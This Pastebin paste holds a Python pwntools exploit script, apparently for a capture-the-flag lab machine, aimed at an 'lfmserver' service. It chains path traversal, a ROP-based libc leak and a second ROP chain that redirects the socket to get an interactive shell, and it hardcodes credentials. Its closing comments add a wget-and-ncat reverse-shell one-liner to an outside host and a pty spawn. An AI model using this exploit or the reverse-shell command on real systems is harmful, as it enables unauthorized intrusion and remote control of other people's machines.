Advertisement
Not a member of Pastebin yet?
Sign Up,
it unlocks many cool features!
- #!/usr/bin/env python3 -B -u
- #-*- coding: utf-8 -*-
- import sys
- from pwn import *
- context.arch = "amd64"
- # context.log_level = "error" # "debug"
- def encode(ss): return "".join("%{0:0>2}".format(format(c,"x")) for c in ss)
- if __name__ == "__main__":
- fd,N = 6,106
- IP,PORT = "10.10.10.173",8888
- r = remote(IP,PORT)
- usrname = "lfmserver_user"
- passwd = "!gby0l0r0ck$$!"
- hash = "26ab0db90d72e28ad0ba1e22ee510510"
- preamble = ("%2e%2e%2f"*5) + "%2e%2e/proc/sys/kernel/randomize_va_space%x00" + ("A"*N)
- bin = ELF("./lfmserver")
- # payload = p64(0x405c4b) + p64(fd) + p64(0x405c49) + p64(bin.got["dup2"]) + p64(0) + p64(0x40251f) + p64(bin.plt["write"])
- payload = p64(0x405c4b) + p64(fd) + p64(0x405c49) + p64(4231200) + p64(0) + p64(0x40251f) + p64(4203552)
- req = "CHECK /{} LFM\r\nUser={}\r\nPassword={}\r\n\r\n{}\n".format(preamble+encode(payload),usrname,passwd,hash)
- r.sendline(req)
- libc = ELF("./libc-2.28.so")
- leak = r.recvall().split(b"\n")[4][1:7]
- leak = u64(leak.ljust(8,b"\x00"))
- # libc.address = leak - libc.symbols["dup2"]
- libc_addr = leak - 1091264
- log.info("base(libc) @ 0x%08x"%libc_addr)
- r.close()
- r = remote(IP,PORT)
- payload = p64(0x405c4b)
- payload += p64(fd)
- payload += p64(0x405c49)
- payload += p64(0x0)
- payload += p64(0x0)
- # payload += p64(bin.plt["dup2"])
- payload += p64(4202560)
- payload += p64(0x405c4b)
- payload += p64(fd)
- payload += p64(0x405c49)
- payload += p64(0x1)
- payload += p64(0x0)
- # payload += p64(bin.plt["dup2"])
- payload += p64(4202560)
- payload += p64(0x405c4b)
- payload += p64(fd)
- payload += p64(0x405c49)
- payload += p64(0x2)
- payload += p64(0x0)
- # payload += p64(bin.plt["dup2"])
- payload += p64(4202560)
- # rop = payload + p64(poprdi) + p64(1) + p64(poprsi) + p64(bin.got["dup2"]) + p64(0) + p64(ropnop) + p64(bin.plt["write"]) + p64(ropnop) + p64(libc.address + 0x501e3)
- rop = payload + p64(0x405c4b) + p64(1) + p64(0x405c49) + p64(4231200) + p64(0) + p64(0x40251f) + p64(4203552) + p64(0x40251f) + p64(libc_addr+0x501e3)
- preamble = ("%2e%2e%2f"*5) + "%2e%2e/proc/sys/kernel/randomize_va_space%x00" + ("A"*N)
- req = "CHECK /{} LFM\r\nUser={}\r\nPassword={}\r\n\r\n{}\n".format(preamble+encode(rop),usrname,passwd,hash)
- r.sendline(req)
- r.interactive()
- # wget http://10.10.16.213:8000/ncat -O /tmp/nc && chmod 0775 /tmp/nc && /tmp/nc 10.10.16.213 1337 -e /bin/sh
- # python -c "import pty; pty.spawn(\"/bin/bash\")"
Advertisement
Add Comment
Please, Sign In to add comment
Advertisement